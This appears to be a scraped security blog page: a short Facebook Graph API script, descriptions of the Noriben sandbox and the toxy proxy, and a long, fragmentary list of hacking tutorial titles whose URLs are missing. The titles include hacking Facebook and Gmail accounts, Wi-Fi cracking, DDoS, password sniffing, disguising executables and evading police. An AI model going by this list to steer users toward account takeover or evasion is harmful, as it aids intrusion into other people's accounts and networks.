oauth_access_token = 'XXXXXXXXXXXXXXXXXXXX'
graph = facebook.GraphAPI(oauth_access_token)

###### Try get friends list of account
profile = graph.get_object("me")
friends = graph.get_connections("me", "friends")
friend_list = [friend['name'] for friend in friends['data']]
print friend_list

groups = graph.get_object("me/groups")

###### Try post in wall
#graph.put_wall_post(message="Hello World")


Aug 6, 2015

Tools: Noriben Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.
Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.


Tools: toxy - hackable HTTP proxy

toxy is a hackable HTTP proxy to simulate failure scenarios and unexpected conditions, built for node.js/io.js.
It was mainly designed for fuzz/evil testing purposes, becoming particulary useful to cover fault tolerance and resiliency capabilities of a system, tipically in service-oriented distributed architectures, where toxy may act as intermediate proxy among services.
toxy allows you to plug in poisons, optionally filtered by rules, which basically can intercept and alter the HTTP flow as you want, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code.
toxy is compatible with connect/express, and it was built on top of rocky, a full-featured, middleware-oriented HTTP proxy.


Link Resource For Learning Security

Testing and learning
----------------------- <--- fuckin' down, AGAIN <--- helpful for learning Assembly <--- Sounds like he made it on his mom's computer, some useful information, but most is skid-like bullshit. <--- Find wifi hotspots in your area <---Honey-pot maker <-- find computers and servers <-- decent recon tool
-------------------------------------------- <--- great for beginners learning GNU/Linux <---great community
============================================================================================================ <---- port 80 search engine
Recommended VPNs
------------------------ (doesn't log SHIT, a bit sketchy for free tho)
Good reads
How to prepare SQL Injection attack with SQLMap on Kali Linux
How to hack Wi-Fi using Wifite
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux
How to prepare SYN Attack using Kali Linux
How to prepare DDOS attack on a website using Kali Linux
4 ways to hack Facebook account
4 ways hacking Gmail account
How to update rules in SNORT
How to hack Facebook account using SE-Toolkit on Kali Linux
How to find information about some using Maltego
How to gather information about someone using Backtrack
Gathering information using NMap
How to install firewall on Linux machine
How to configure firewall
Videotutorial pokazujacy praktyczne zastosowanie ataku Parameter Delimeter
Step-By-Step SQL Injection
How to use SQLMap tool
Tutorial about Search Engine Dorking
RFI Tutorial
Text tutorial about preparing Man in the Middle attack using Ettercap tool
How to prepare DDOS attack on a website using Kali Linux
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux
How to prepare SQL Injection attack with SQLMap on Kali Linux
Using HPing3 tool in Kali Linux
How to use THC-IPv6 toolset
How to use Ping tool in Linux
Tutorial about using NMap port scanner
Usage of Brutus AET2
How to sniff passwords using Cain
Sniffing logins and passwords
Graphical view on the network using Etherape
Videotutorial that shows how to use NMap on Kali Linux
How to do ARP Poisoning attack using Ettercap
How to prepare Man in the Middle attack using Ettercap
How to see network usage with Ettercap
Description of various Network Interfaces
Tutorial about Ping tool usage
How to prepare SYN Attack using Kali Linux
Videotutorial that shows how to hack WPA & WPA2 password using Aircrack-ng software
How to crack Wi-Fi protected by WEP using Aircrack-ng
How to hack Wi-Fi protected by WPA/WPA2 using Aircrack-ng
How to prepare EvilTwin attack on Kali Linux
How to crack WEP faster in Kali Linux
How to hack WEP protected Wi-Fi with Aircrack-ng
How to hack WPA/WPA2 Wi-Fi protected network using Reaver
How to hack Wi-Fi using Wifite
How ATM can be hacked with just a SMS
Linux Security Secrets and Solutions
Over 70 recipes to help you master Kali Linux for effective penetration testing
Kilka ataków na starsza wersje systemu operacyjnego Windows
Czyli jak otworzyc plik .exe myslac ze to .jpg
How to reset Windows admin password using Linux :)
How to hack Win7 using backdoor on Kali Linux
Poradnik pokazuje jak wlamac sie do komputera z systemem windows.
How to exploit Windows7 machine using Metasploit
Some ways to exploit Windows7 & 8 using Backtrack
Videotutorial pokazujacy uzycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS
How to enumerate DNS using DNSMap on Kali Linux
How to crack MD5 hash using Perl script on Kali Linux
How to hack remote computer if you know an IP address ;)
How to secure hard drive with TrueCrypt
How to create encrypted hidden volumes in TrueCrypt
Introduction to Public Key Cryptography
Film pokazuje jak odkryc numery GG, które maja ustawione dane haslo
How to admin an IRC channel :)
How to IRC anonymously with XChat+Tor
Jak zrobic wlasny jezyk programowania bazujac na Rubym. Czesc II - tworzenie jezyka kompilowanego do pseudokodu
Jak uzywac wzorca Registry w jezyku PHP
How to install VirtualBox on Windows
How to install Guest Additions in Virtualbox
Tutorial porusza kwestie Bluetooth w androidzie :)
Tutorial porusza podstawy grafiki 2D w androidzie.
Kilkanascie hakerskich pojec, które powinien znac kazdy zaczynajacy przygode z hackingiem
How to install Ubuntu
How to configure Ubuntu
Installing Tor for Windows
How to clean up traces in Windows
How to shred free space
How to secure your computer and surf completely anonymous
How to configure Tor Only Environment
How to protect yourself from police
How to install IRC client on Linux machine
How to install Torchat
How to configure SNORT
Daily usage of Tor
Basic usage of Wireshark
Usage of Wireshark's filters
How to configure BASE to work with SNORT
Using BleedingSNORT rules in SNORT
Some things about Port Mirroring in SNORT
How to use TCPDump tool
How to use HarVester tool in Kali Linux
Wyjasnienie znaczenia komunikatów tekstowych w BIOS'ie
How to turn your smartphone into computer webcam
Conclusion about Black Hat Style tutorials
Good linux torrent clients
---------------------------- <--- been told this is the best torrent client ever to come to Linux, and i have to agree <--- i use this, its pretty great
Look into Rtorrent as well
20 things to do after installing kalinux
Coding challenges and recources that will make you a expert coder
How to compile a linux program from source
torrent websites
Magnet links to VERRYYY big files with libraries of information
magnet:?xt=urn:btih:0bbfaaf5f469a2bd3d762f6942a302f7014a35e9&dn=Gentoomen%20Library& (/G/entooman's library, 32 GB of computer information from A-Z, a bit outdated)
(75 gig file full of every instruction and guide posted on halfchan /k/, a /k/omando's dream)
magnet:?xt=urn:btih:c09013f19e37e8aae5465565fd1b266931179c44&   <--- 1800 IT related
books, some seed it for fucks sake
Linux eBooks Collection [PDF]
Narzew tutorials
Kali Linux Cookbook
Over 70 recipes to help you master Kali Linux for effective penetration testing
Black Hat Style - Tor Only Environment
How to configure Tor Only Environment
Hacking Facebook with SET Phishing
How to hack Facebook account using SE-Toolkit on Kali Linux
Search Engine Dorking
Tutorial about Search Engine Dorking
Using XChat with Tor
How to IRC anonymously with XChat+Tor
Ataki na Windows 95/98
Kilka ataków na starszą wersję systemu operacyjnego Windows
Black Hat Style - Tor Daily Usage
Daily usage of Tor
Black Hat Style - Installing Firewall
How to install firewall on Linux machine
Hacking Facebook account
4 ways to hack Facebook account
Black Hat Style - Installing IRC client on Linux machine
How to install IRC client on Linux machine
Komunikaty tekstowe BIOS
Wyjaśnienie znaczenia komunikatów tekstowych w BIOS'ie
SQLMap For Dummies
How to use SQLMap tool
Hacking Linux Exposed - 3rd Edition
Linux Security Secrets and Solutions
Podstawy hackingu
Kilkanaście hakerskich pojęć, które powinien znać każdy zaczynający przygodę z hackingiem
Black Hat Style - Firewall Configuration
How to configure firewall
Hacking remote computer with IP address
How to hack remote computer if you know an IP address ;)
Black Hat Style - Securing Hard Drive
How to secure hard drive with TrueCrypt
Ping Tutorial
How to use Ping tool in Linux
Własny język programowania cz. 2
Jak zrobić własny język programowania bazując na Rubym. Część II - tworzenie języka kompilowanego do pseudokodu
Black Hat Style - Shredding Free Space
How to shred free space
NMap - A Stealth Port Scanner
Tutorial about using NMap port scanner
Black Hat Style - Tor for Windows
Installing Tor for Windows
Black Hat Style - Installing Torchat
How to install Torchat
Black Hat Style - How to secure your computer and surf anonymously
How to secure your computer and surf completely anonymous
Sniffing logins and passwords
Sniffing logins and passwords
Hacking Gmail
4 ways hacking Gmail account
Black Hat Style - Conclusion
Conclusion about Black Hat Style tutorials
IRC Channel Operator Tutorial
How to admin an IRC channel :)
Remote File Inclusion
RFI Tutorial
Black Hat Style - Ubuntu Configuration
How to configure Ubuntu
Black Hat Style - Setting up TrueCrypt, Encrypted Hidden Volumes
How to create encrypted hidden volumes in TrueCrypt
Atak Parameter Delimeter w praktyce
Videotutorial pokazujący praktyczne zastosowanie ataku Parameter Delimeter
Black Hat Style - Installing VirtualBox on Windows
How to install VirtualBox on Windows
SQL Injection Step-By-Step
Step-By-Step SQL Injection
DNS Enumeration w praktyce
Videotutorial pokazujący użycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS
HPing3 Tutorial
Using HPing3 tool in Kali Linux
Black Hat Style - HD CleanUp Windows
How to clean up traces in Windows
Reseting Windows Administrator Password
How to reset Windows admin password using Linux :)
Brutus AET2
Usage of Brutus AET2
Sniffing Passwords using Cain
How to sniff passwords using Cain
THC-IPv6 Tutorial
How to use THC-IPv6 toolset
Black Hat Style - Installing Ubuntu
How to install Ubuntu
DNS Enumeration using DNSMap
How to enumerate DNS using DNSMap on Kali Linux
Ukrywanie rozszerzeń plików
Czyli jak otworzyć plik .exe myśląć że to .jpg
Własny język programowania cz. 1
Jak zrobić własny język programowania bazując na Rubym. Część I - tworzenie języka interpretowanego
Black Hat Style - Installing VirtualBox Guest Additions
How to install Guest Additions in Virtualbox
Anti-Police Tutorial
How to protect yourself from police
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ <---Dedicated to only IT books; very fast; unlimited downloads.
^All of them are sisters; huge and rapidly increasing resources of everything (at the present nearly 2.5 million books are available); free users are limited to 10 (actually 9 !!) books per day. <------Another great resource; however most of the books are outdated,be warned!